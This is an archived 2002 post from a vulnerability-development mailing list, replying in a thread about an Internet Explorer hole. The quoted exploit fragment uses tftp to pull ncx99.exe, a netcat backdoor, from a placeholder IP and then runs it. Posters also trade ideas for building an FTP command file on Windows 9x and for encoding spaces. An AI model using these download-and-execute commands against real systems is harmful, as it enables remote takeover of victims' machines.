Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Rather large MSIE-hole

From: NoCoNFLiC <nocon () castleblack darkflame net>
Date: Fri, 15 Mar 2002 09:30:12 -0600
[dotslash () snosoft com] Thu, Mar 14, 2002 at 04:56:50PM -0500 wrote:

Sorry if someone else has said this... but has anyone tryed using + as a 
space like you had to when using cmd.exe via unicode exploit?
-KF


Felipe Franciosi wrote:


var programName=new Array(
    'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe',
    'c:/winnt/system32/ncx99.exe',
);



MS Windows 9x don't have trivial ftp client by default... I was
thinking how this could be exploitable on these versions...

The FTP client offers the option to read a text-file containing
line separated commands.

But I couldn't get to work something like:
var prog...
     'c:/command.com /c echo bin > c:/list.txt',
     'c:/command.com /c echo GET something >> c:/list.txt'

this won't create 'list.txt'... Any ideas why? Or how some could
get around it?



agian, i haven't tried but maybe replace the space's with it's hex equiv "%20" ?


-- 

- nocon

======================================

nocon () darkflame net
http://nocon.darkflame.net

======================================
Previous By Date Next
Previous By Thread Next

Current thread: